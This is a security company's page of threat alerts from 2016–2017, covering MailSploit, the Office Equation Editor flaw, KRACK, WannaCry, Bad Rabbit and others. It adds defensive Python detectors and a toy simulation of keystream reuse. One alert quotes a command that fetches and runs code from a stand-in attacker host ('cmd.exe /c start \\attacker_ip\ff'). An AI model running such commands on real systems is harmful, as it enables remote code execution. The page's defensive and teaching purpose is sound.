Security Alerts

  • MailSploit and the vulnerabilities of e-mail applications
    10 Dec 2017
    Security researcher Sabri Haddouche discovered MailSploit, a set of vulnerabilities affecting Apple Mail (macOS, iOS and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail and others.

    Although most of the affected email clients implement anti-spoofing mechanisms (such as DKIM and DMARC), MailSploit takes advantage of the way email clients and web interfaces parse the "From" header.

    Email spoofing is an old-school technique: the sender forges the email headers so that a message appears to come from a different address, in order to trick recipients. Haddouche explained how the weaknesses of vulnerable email clients can enable such an attack without exploiting any flaw in DMARC. To demonstrate it, the researcher created a payload by encoding non-ASCII characters inside the email headers and successfully sent a spoofed email that appeared to come from an official address belonging to the President of the United States.
    Haddouche reported the spoofing bug to the vendors of 33 different client applications; 8 of them patched the issue in their products before public disclosure and 12 are working on a fix. Mozilla and Opera, however, consider it a server-side issue.
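    The core of the problem described above is that a client decodes the encoded-words of a "From" header and then renders the result without checking what came out. The following check, an added example that is not part of the original alert or of the researcher's work, decodes a raw header the way a mail gateway or a log-review script would, separates the displayed name from the real address, and flags two anomalies: control characters that appear only after decoding, and a display name that itself looks like an email address. The three sample headers are constructed for the example.

```python
import base64
import email.header
import re

# C0 control characters (NUL, CR, LF, ...) and DEL: none of these belongs in a
# decoded From header, and a client that stops rendering at the first one will
# show a truncated, misleading sender.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# The real address is the last angle-bracketed part of the header.
ANGLE_ADDR = re.compile(r"<([^<>]*)>\s*$")


def decode_from_header(raw: str) -> str:
    """Decode every RFC 2047 encoded-word in a raw From header into one string."""
    decoded = []
    for chunk, charset in email.header.decode_header(raw):
        if isinstance(chunk, bytes):
            decoded.append(chunk.decode(charset or "ascii", errors="replace"))
        else:
            decoded.append(chunk)
    return "".join(decoded)


def check_from_header(raw: str) -> dict:
    """Split the decoded header into display name and address and list anomalies."""
    decoded = decode_from_header(raw)
    match = ANGLE_ADDR.search(decoded)
    address = match.group(1).strip() if match else decoded.strip()
    display_name = decoded[:match.start()].strip().strip('"') if match else ""
    findings = []
    if CONTROL_CHARS.search(decoded):
        findings.append("control characters after decoding")
    if "@" in display_name:
        findings.append("display name looks like an address but differs from the real one")
    return {"display_name": display_name, "address": address, "findings": findings}


# Constructed sample headers (not taken from the original research).
BENIGN = '"Alice Example" <alice@example.com>'
BENIGN_UTF8 = "=?utf-8?b?Sm9zw6k=?= <jose@example.com>"  # display name "José"
# A display name that decodes to an address followed by a NUL byte, placed in
# front of a different real address: the pattern a gateway rule should flag.
_spoofed_name = base64.b64encode("ceo@example.com\x00".encode("utf-8")).decode("ascii")
SUSPICIOUS = f"=?utf-8?b?{_spoofed_name}?= <someone@example.net>"

if __name__ == "__main__":
    for header in (BENIGN, BENIGN_UTF8, SUSPICIOUS):
        print(check_from_header(header))
```

    Run against a mail log or a quarantine folder, the "findings" list is what a rule would act on; legitimate non-ASCII names such as the second sample decode cleanly and produce no finding.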

    Correction:
    • Inform your users ASAP not to open emails from unknown senders
    • Update your malware detection software promptly

    Our analysts are already on hand and monitor any suspicious activity.
  • 17-year-old vulnerability in Microsoft Office
    30 Nov 2017
    Researchers have revealed a serious vulnerability in Microsoft Office that could allow attackers to remotely install malicious software on targeted computers. The issue exists in all versions of Microsoft Office released in recent years, including Microsoft Office 365, and works on all versions of the Windows operating system.
     
    The vulnerability is a memory-corruption bug, identified as CVE-2017-11882, located in EQNEDT32.EXE, the MS Office component responsible for inserting and editing equations in documents. Because of improper memory handling, the component fails to handle objects in memory correctly and corrupts it in such a way that an attacker can execute malicious code in the context of the logged-on user.
     
    Combined with the exploitation of a Windows kernel privilege-escalation vulnerability (such as CVE-2017-11847), this vulnerability enables full control of a system. Microsoft addressed it in this month's patch release by changing the way the affected software handles objects in memory.
     
    Possible scenarios:
    • Running an arbitrary sequence of commands (for example, downloading an arbitrary file from the Internet and running it).
    • Launching an executable file from an attacker-controlled WebDAV server.
    • Running the command "cmd.exe /c start \\attacker_ip\ff", which triggers the start of the WebClient service.
     
    Ways of protection:
    • It is recommended that users apply the November security updates.
    • Users can run a command at the command line that disables the component through its Windows registry entry.
    • Users must also enable the Microsoft Office sandbox to prevent active content (OLE / ActiveX / macros) from running.
    • Update antivirus software.
    • Activate sandboxing on the firewall and/or the endpoints.
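    Besides patching, incident responders usually want a quick way to triage incoming documents for the component this alert describes. The following scanner is an added example, not Microsoft's or the researchers' code: it walks the OLE objects embedded in an RTF file and reports those that reference the Equation Editor, either through the object's ProgID or, when the class word has been left out, through the class name stored in the object data. The three RTF fragments are constructed for the test and contain only the object wrapper, not an exploit; the heuristic is an assumption and will not catch every obfuscated sample.

```python
import re

# RTF embeds an OLE object as {\object ... {\*\objclass ProgID}{\*\objdata <hex>}}.
OBJCLASS_RE = re.compile(r"\\objclass\s*([^\\{}\s]+)")
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")


def extract_objects(rtf: str) -> list:
    """Return one {"progid", "data"} entry per \\object group in the RTF text."""
    objects = []
    for segment in re.split(r"\\object\b", rtf)[1:]:
        cls = OBJCLASS_RE.search(segment)
        data = OBJDATA_RE.search(segment)
        raw = bytes.fromhex("".join(data.group(1).split())) if data else b""
        objects.append({"progid": cls.group(1) if cls else "", "data": raw})
    return objects


def is_equation_object(obj: dict) -> bool:
    """Heuristic: the ProgID starts with 'Equation.', or the object data names the
    Equation Editor (ANSI in the OLE 1.0 header, UTF-16 inside the compound file)."""
    return (obj["progid"].lower().startswith("equation.")
            or b"Equation" in obj["data"]
            or "Equation".encode("utf-16-le") in obj["data"])


def equation_objects(rtf: str) -> list:
    """ProgIDs ('' when the class word is omitted) of embedded Equation Editor objects."""
    return [o["progid"] for o in extract_objects(rtf) if is_equation_object(o)]


def _ole1_header(progid: str) -> str:
    """Hex of a minimal OLE 1.0 object header (version, format id, ANSI class name)."""
    name = progid.encode("ascii") + b"\x00"
    return (b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00"
            + len(name).to_bytes(4, "little") + name).hex()


# Constructed RTF fragments for testing; they carry no exploit, only the object wrapper.
SAMPLE_EQUATION = (r"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}{\*\objdata "
                   + _ole1_header("Equation.3") + "}}}")
SAMPLE_BENIGN = (r"{\rtf1\ansi{\object\objemb{\*\objclass Word.Document.8}{\*\objdata "
                 + _ole1_header("Word.Document.8") + "}}}")
# The same object with the \objclass control word left out: the data still gives it away.
SAMPLE_NO_CLASS = (r"{\rtf1\ansi{\object\objemb{\*\objdata "
                   + _ole1_header("Equation.3") + "}}}")

if __name__ == "__main__":
    for name, sample in (("equation", SAMPLE_EQUATION), ("benign", SAMPLE_BENIGN),
                         ("no class", SAMPLE_NO_CLASS)):
        print(name, "->", equation_objects(sample))
```

    A non-empty result is a reason to quarantine the file and check that the November update is installed on the machine that received it; an empty result is not proof of safety, because object data can also be compressed or split across runs.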
  • Bad Rabbit: a new large-scale attack
    25 Oct 2017
    Over 200 large organizations in Russia, Ukraine, Turkey and Germany have been infected by new malware called Bad Rabbit. The attack is strongly reminiscent of the Petya malware that hit thousands of computers in corporate networks. Files on systems affected by Bad Rabbit are encrypted, and the attackers demand a ransom in bitcoin from their victims to unlock them.

    It spreads either through a fake Adobe Flash update or by scanning the network for the SMB service and then running the open-source post-exploitation tool Mimikatz.
     
    • Inform your users ASAP:
    -  not to open emails from unknown senders
    -  to delete emails about installing / upgrading Adobe Flash Player
    -  not to download programs from the web
     
    • Update malware detection software immediately

    Our analysts are already on hand and monitor any suspicious activity.
  • 0-Day Exploit for Adobe Flash
    24 Oct 2017
    The well-known BlackOasis group is responsible for identifying and exploiting a new zero-day vulnerability (CVE-2017-11292) in Adobe Flash Player 21.0.0.226. Successful exploitation allows the execution of malicious code, through which the FinSpy software is installed.

    The exploit code is delivered through a Microsoft Office file that contains an ActiveX object including the Flash exploit. The attacker attaches the malicious file to an email message and sends it to the unsuspecting user. When the user opens the file, the malicious code is executed and the FinSpy malware is installed on their computer.

    FinSpy, also known as FinFisher, provides the attacker with extensive spying capabilities on an infected system, including covert surveillance through camera and microphone activation, recording of Skype calls, etc.

    Adobe will soon release a security update for Flash Player and the products that use it.

    Our analysts are already on hand and monitor any suspicious activity.
  • WPA2 Hacked
    19 Oct 2017
    Attackers can now attack WPA2 Wi-Fi networks through Key Reinstallation Attacks (KRACK).

    The attack targets the WPA2 4-way handshake that runs when a device tries to connect to a wireless network, manipulating the handshake messages with which the encryption key is negotiated while the device is connecting. The client is tricked: once message 3 of the handshake is received, the key is installed and the encryption of normal data frames begins.

    Because these messages may be lost or dropped, the Access Point is forced to retransmit message 3. The client therefore receives the same message several times and is forced to reinstall the same key each time.
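    Why reinstalling the same key is harmful is easier to see in a small simulation than in prose. The example below is added here and is not the KRACK researchers' code: it models the client side of the handshake with a toy keystream (a hash of key and packet number stands in for the real cipher, an assumption made for the example) and delivers message 3 twice around one data frame. As the published KRACK research describes, the vulnerable client resets its packet number when it reinstalls the key, so two frames are encrypted with the same keystream and their XOR leaks the XOR of the plaintexts; the patched client simply refuses to reinstall a key it already holds, which is what the vendor fixes do.

```python
import hashlib


def keystream(ptk: bytes, packet_number: int, length: int) -> bytes:
    """Toy stand-in for the per-frame keystream: derived only from the key and the
    packet number, exactly the property that makes a reset packet number dangerous.
    (Assumption: a hash-based construction replaces the real CCMP/AES-CTR.)"""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(ptk + packet_number.to_bytes(6, "big")
                              + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Minimal model of the client side of the 4-way handshake."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.packet_number = 0

    def receive_message3(self, ptk: bytes) -> None:
        # Message 3 tells the client to install the negotiated pairwise key.
        if self.patched and self.ptk == ptk:
            return  # patched behaviour: an already-installed key is never reinstalled
        self.ptk = ptk
        self.packet_number = 0  # (re)installing the key resets the transmit counter

    def encrypt(self, plaintext: bytes) -> tuple:
        self.packet_number += 1
        ct = xor_bytes(plaintext, keystream(self.ptk, self.packet_number, len(plaintext)))
        return self.packet_number, ct


def simulate(patched: bool) -> dict:
    """Deliver message 3 twice (lost acknowledgement, so the AP retransmits) around
    one data frame and report whether the client reused keystream."""
    ptk = bytes(range(16))  # constructed key; a real PTK comes from the handshake
    frame1 = b"meter reading: 17"
    frame2 = b"meter reading: 42"  # same length, so keystream reuse is directly visible
    client = Supplicant(patched)
    client.receive_message3(ptk)
    pn1, ct1 = client.encrypt(frame1)
    client.receive_message3(ptk)  # retransmitted message 3
    pn2, ct2 = client.encrypt(frame2)
    reused = pn1 == pn2
    # With the same key and packet number, ct1 XOR ct2 equals frame1 XOR frame2:
    # the keystream cancels out and the relationship between plaintexts leaks.
    leaks = xor_bytes(ct1, ct2) == xor_bytes(frame1, frame2)
    return {"packet_number_reused": reused, "plaintext_xor_leaks": leaks}


if __name__ == "__main__":
    print("vulnerable:", simulate(patched=False))
    print("patched:   ", simulate(patched=True))
```

    The lesson for defenders is that the fix lives in the client's state handling, not in the key exchange itself, which is why applying vendor patches to clients (and to access points that act as clients) is the correction for this alert.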

    Our analysts are already on hand and monitor any suspicious activity.
  • Trojan: CCleaner
    16 Oct 2017
    About 2.27 million users downloaded and installed the well-known CCleaner software on their computers and mobile devices.
    Cisco's Talos research team discovered the breach, informed Piriform on September 13th, and confirmed that version v5.33.6162 of the program had been tampered with by cybercriminals between August 15th and September 12th.
    The result of the breach was the addition of a Trojan horse to the software, which leaked information without the user's knowledge. Through it, the cybercriminals collected information such as the computer name, IP addresses, the list of installed programs, the list of running programs, etc.

    Correction:
    1) Restore the user's system to a state dated earlier than August 15th.
    2) Scan and clean the machine.
    3) Remove malicious add-on extensions.
    4) Reset to the default program settings.

    Our analysts are already on hand and monitor any suspicious activity.
  • Greek-Turkish cyberwarfare!
    06 Jul 2017
    The now well-known hacking group Turk Hack Team has carried out many attacks in Turkish cyberspace. Now it is also targeting Greek cyberspace!!!
    The first web defacement attacks on Greek sites have already taken place, resulting in the loss of confidential information (names, emails, phone numbers, employment status of employees, etc.) of educational institutions and government organizations.
    The result has been a Greek response: hackers attacked Turkish sites and leaked confidential information.
    Typically, Greek Anonymous are asking the Turkish hackers to stop the attacks, indicating that they hold government databases. They say they have also gained access to Turkish cameras, and have already released a demo video as proof.

    We inform you that our company, through its WAF as a Service and 24x7 Real Threat Management services, provides the necessary site protection mechanisms.

    For more information, please call +30 210 9203300 or email n.kladakis@netbull.gr
  • New large-scale cyber attack
    27 Jun 2017
    A large-scale ransomware cyber attack is currently under way in Europe, having hit hundreds of businesses and other organizations, including banks, construction companies and other industries, as well as Boryspil Airport in Kiev. In Ukraine several infection incidents have been recorded, and a "hit" also took place against the country's electricity provider, Ukrenergo, which left 230,000 people in the country without electricity for about six hours!
    Incidents are also reported in the Netherlands, and the shipping company Maersk has confirmed that several of its online infrastructures have been shut down. Similar announcements were made by Rosneft, an oil company in Russia.
    According to a Kaspersky Lab researcher, the attack is based on the Petwrap malware, a variant of the Petya ransomware discovered last March. What makes the situation extremely worrying is that so far it is not clear exactly how the infection is transmitted. It cannot be excluded, however, that it relies on the same known exploit as WannaCry, which targets an unpatched vulnerability in the SMB protocol.
    The creators of the ransomware have not been identified, but their goal is to collect a ransom to "free" infected systems. They demand $300 from each victim.

    The following actions are proposed:
     
    • Make users aware not to open attachments from unknown senders
    • Update the antivirus
    • Update the Intrusion Prevention System
    Our analysts are already on alert and monitor any suspicious activity.
  • Subtitles: The new backdoor
    12 Jun 2017
    A new way of breaking into computers!
    Attackers can now compromise a computer using malicious code embedded in movie subtitles that users download unsuspectingly. The attack relies on the subtitle processing of media player software and on the large number of subtitle formats (> 20). Each format has unique features and capabilities that an attacker can exploit.
    Media players such as Kodi.tv, VLC, etc. are used by attackers as the entry point. The attack takes place when the user downloads and loads the infected subtitle file, giving the attacker access to the computer or to any IoT device.
     
    To counter the attack, we suggest:
     
    • Upgrading the player software to the latest version.
    • Updating the IPS subsystem to prevent this attack.
    • Monitoring and managing security incidents through Netbull Managed Threat Defense Services.
  • New Wave of Attacks?
    02 Jun 2017
    After "WannaCry" comes "EsteemAudit", which exploits a vulnerability in the Remote Desktop protocol (port 3389) of Windows XP and Windows Server 2003, which are no longer supported by Microsoft.
    The notorious ShadowBrokers group says that "EsteemAudit", as well as "EnglishmanDentist" and "ExplodingCan", pose a significant risk to these systems, because the patches that would make them safe have not yet been created.

    To counter the attack, we suggest:
     
    • Update the IPS service (Check Point reference: CPAI-2017-0424, published 18 May 2017) to the latest version, in prevent mode.
    • Disable the RDP service, if possible.
    • Real-time 24x7 monitoring for Remote Desktop attacks through the inter-chunk heap overflow vulnerability.
    As part of customer protection, our company has already upgraded its IPS systems and created the appropriate signature on the security incident management platform, so that traces of the attack are detected immediately.
  • Alert for new attacks?
    26 May 2017
    On the occasion of the first worldwide cyber attack, which has hit more than 150 countries, including our country, where it affected the Aristotle University, we inform you that the now well-known "Shadow Brokers" group has announced that it will publish a series of exploits that it is better to know about.
     
    The exploits that have been announced are as follows:
     
    • EARLYSHOVEL: RedHat 7.0 - 7.1 Sendmail 8.11.x exploit.
    • EBBISLAND (EBBSHAVE): root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 and 10 (possibly newer), both SPARC and x86.
    • ECHOWRECKER: remote Samba 3.0.x Linux exploit.
    • EASYBEE appears to be an MDaemon email server vulnerability.
    • EASYFUN: EasyFun 2.2.0 exploit for WDaemon / IIS MDaemon/WorldClient pre 9.5.6.
    • EASYPIX is an IBM Lotus Notes exploit that gets detected as Stuxnet.
    • EWOKFRENZY is an exploit for IBM Lotus Domino 6.5.4 & 7.0.2.
    • EXPLODINGCAN is an IIS 6.0 exploit that creates a remote backdoor.
    • ETERNALROMANCE is an SMB1 exploit over TCP port 445 targeting XP, 2003, Vista, 7, Windows 8, 2008 and 2008 R2, and gives SYSTEM privileges (MS17-010).
    • EDUCATEDSCHOLAR is an SMB exploit (MS09-050).
    • EMERALDTHREAD is an SMB exploit for Windows XP and Server 2003 (MS10-061).
    • EMPHASISMINE is a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2.
    • ENGLISHMANSDENTIST sets Outlook Exchange WebAccess rules to trigger executable code on the client's side, sending an email to other users.
    • EPICHERO: 0-day exploit (RCE) for Avaya Call Server.
    • ERRATICGOPHER is an SMBv1 exploit targeting Windows XP and Server 2003.
    • ETERNALSYNERGY is an SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010).
    • ETERNALCHAMPION is an SMBv1 exploit.
    • ESKIMOROLL is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers.
    • ECLIPSEDWING is an RCE exploit for the Server service in Windows Server 2008 and later (MS08-067).
    • ETCETERABLUE is an exploit for IMail 7.04 to 8.05.
    • EXPIREDPAYCHECK is an IIS6 exploit.
    • EAGERLEVER is an NBT/SMB exploit for Windows NT 4.0, 2000, XP SP1 & SP2, 2003 SP1 & base release.
    • EASYFUN is a WorldClient / IIS 6.0 exploit.
    • ESSAYKEYNOTE
    More information can be found in the Exploit Database.
  • First Worldwide Cyber attack!
    12 May 2017
    More than 40,000 attacks have now been recorded in 74 countries during the first cyberwar launched by hackers. The attack began in Great Britain, where the National Health Service was hit and computers were "locked", forcing hospitals to send patients elsewhere. The attack quickly spread to many countries. It was carried out using a new version of the WannaCry malware.
    WannaCry or WanaCrypt0r 2.0 is software that exploits a Windows vulnerability, seeking to infect every workstation. Its purpose is to encrypt important files and demand money as ransom for the decryption key. A computer can be infected through a Word document, a PDF and, in general, through emailed or already infected files. It initially infects one computer and then tries to spread across the internal network.

    To counter the attack, we suggest:
     
    • Updating the Windows operating system with the latest security hotfixes
    • Installing zero-day malware protection software
    • User awareness
     
    If a machine is infected with the WanaCrypt0r ransomware, you should:
     
    • Disconnect the machine from the Internet and do not send any file to another machine, to prevent it from spreading.
    • Clean up the machine, check the network, and restore the files from the backup, if any.
    • Update the Windows operating system with the latest security hotfixes.
    • Install zero-day malware protection software.
  • Cybercriminals steal information from the accounts of Yahoo users.
    29 Sep 2016
    Yahoo has revealed a breach of about 500 million accounts, which it attributes to cybercriminals backed by the government of a country. In late 2014 the cybercriminals penetrated the company's internal network and obtained information on user accounts. The information included names, email addresses, phone numbers, birth dates, hashed passwords and, in some cases, encrypted or unencrypted security questions and answers.
    Yahoo states that the attackers did not gain access to sensitive information such as unprotected passwords, bank account details and credit or debit card data, as these were stored in a separate system to which the attackers were unable to gain access. To reassure users, the company pointed out that there is no indication the intruders still have access to its systems; nevertheless, it advised users to change their passwords if they had not done so since 2014, and to avoid visiting links or downloading attachments from suspicious messages.
     
    To protect against similar types of attacks, the following are suggested:
     
    • Installation of an endpoint protection software (antivirus, firewall, IPS, Application Control).
    • Frequent change of passwords.
    • Avoiding the use of the same or similar passwords on the Internet and on corporate systems.
    • Use of strong passwords.
    • User awareness of the attack techniques used by hackers.
  • Redirector.Paco
    08 Sep 2016
    Redirector.Paco is click-fraud malware that hijacks HTTPS traffic. Its purpose is to redirect Internet traffic to malicious websites when an unsuspecting user uses a search engine such as Google, Yahoo or Bing.
    To redirect the traffic, the malware modifies the workstation registry, changing the "AutoConfigURL" and "AutoConfigProxy" parameters so that every web request the user makes goes through a web proxy controlled by the attackers, which serves the results they want.
    The malware is distributed through installers of pirated versions of popular software such as WinRAR, YouTube Downloader, etc.
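    Because the redirection described above is entirely driven by two registry values, a workstation can be checked for it from a registry export without any malware signature. The following script is an added example (not the vendor's or any detection product's code): it parses a .reg export of the Internet Settings key, and flags an AutoConfigURL whose host is not one of the organisation's own PAC servers, or an AutoConfigProxy that no longer holds its default handler. The trusted host list and the default value are assumptions to adapt; the two exports are constructed, using a documentation IP address for the suspicious case.

```python
from urllib.parse import urlparse

INTERNET_SETTINGS = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
# Assumptions: the hosts allowed to serve the corporate PAC file, and the default
# handler name that AutoConfigProxy normally holds.
TRUSTED_PAC_HOSTS = {"pac.corp.example"}
EXPECTED_AUTOCONFIG_PROXY = "wininet.dll"


def parse_reg_export(text: str) -> dict:
    """Parse a .reg export into {key_path: {value_name: value}}; strings and dwords only."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result[current] = {}
        elif current and line.startswith('"') and '"=' in line:
            name, _, value = line[1:].partition('"=')
            if value.startswith('"') and value.endswith('"'):
                # .reg files double every backslash inside string values
                result[current][name] = value[1:-1].replace("\\\\", "\\")
            elif value.startswith("dword:"):
                result[current][name] = int(value[len("dword:"):], 16)
    return result


def check_proxy_autoconfig(reg_text: str) -> list:
    """Flag proxy auto-configuration values that point outside the organisation."""
    settings = parse_reg_export(reg_text).get(INTERNET_SETTINGS, {})
    findings = []
    url = settings.get("AutoConfigURL")
    if url:
        host = urlparse(url).hostname or ""
        if host not in TRUSTED_PAC_HOSTS:
            findings.append(f"AutoConfigURL points to untrusted host {host!r}: {url}")
    proxy = settings.get("AutoConfigProxy")
    if proxy is not None and proxy.lower() != EXPECTED_AUTOCONFIG_PROXY:
        findings.append(f"AutoConfigProxy replaced with {proxy!r}")
    return findings


# Constructed exports; the suspicious one uses the documentation address 198.51.100.7.
CLEAN_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]
"ProxyEnable"=dword:00000000
"AutoConfigURL"="http://pac.corp.example/proxy.pac"
"""

SUSPICIOUS_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]
"ProxyEnable"=dword:00000000
"AutoConfigURL"="http://198.51.100.7:8080/proxy.pac"
"AutoConfigProxy"="C:\\\\Users\\\\Public\\\\proxy.dll"
"""

if __name__ == "__main__":
    print("clean:", check_proxy_autoconfig(CLEAN_EXPORT))
    print("suspicious:", check_proxy_autoconfig(SUSPICIOUS_EXPORT))
```

    The export is produced on the workstation with reg export (or collected by an endpoint agent), so the check runs offline and can be scheduled across a fleet; a hit is a reason to reset the two values and look for the pirated installer that the alert names as the delivery channel.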

    To protect against this malware, the following are proposed:
     
    • Regular backups
    • Installation of endpoint protection software (antivirus, firewall, IPS, Application Control)
    • Installation of zero-day malware protection software
  • HummingBad
    03 Aug 2016
    HummingBad is a new type of Android malware that has affected millions of smartphones and tablets around the world in the last few days. The creators of this malware work for an advertising agency called "Yingmob", which operates outside China. It was previously rumored that the company was involved with the malicious iOS software named "YiSpecter". HummingBad installs a persistent rootkit on Android devices, generates fraudulent advertising revenue and installs malicious applications. The way HummingBad works makes it very difficult to detect, since its malicious code is encrypted. Furthermore, the malware starts with a silent attack vector and, if that fails, launches a second attack with the same goal as the first. Finally, each phase of the attack consists of several stages, including the decryption and decompression of malicious code. It is usually detected as "Android.Trojan.Iop.Y" or "Android.Trojan.Agent.A".

    To protect against this malicious software are proposed:

    • Prevent root account activation on your Android device
    • Do not allow the installation of applications from "unknown sources"
    • Upgrade the mobile device to the latest version of the operating system
    • Installation of zero-day malware protection software
  • Satana Ransomware
    26 Jul 2016
    Satana Ransomware combines classic ransomware with Petya. Hackers have developed a new type of ransomware which, like Petya, destroys the master boot record (MBR). Satana is designed to silently penetrate computers and encrypt files. During encryption, the attacker's email address is prepended to each file name. The malware then encrypts the MBR and replaces it with a new one. When the user restarts the computer, the new code is loaded from the MBR and a message appears demanding a ransom to restore the files.

    To protect against this malware, the following are proposed:
     
    • Regular backups
    • Installation of endpoint protection software (antivirus, firewall, IPS, Application Control)
    • Installation of zero-day malware protection software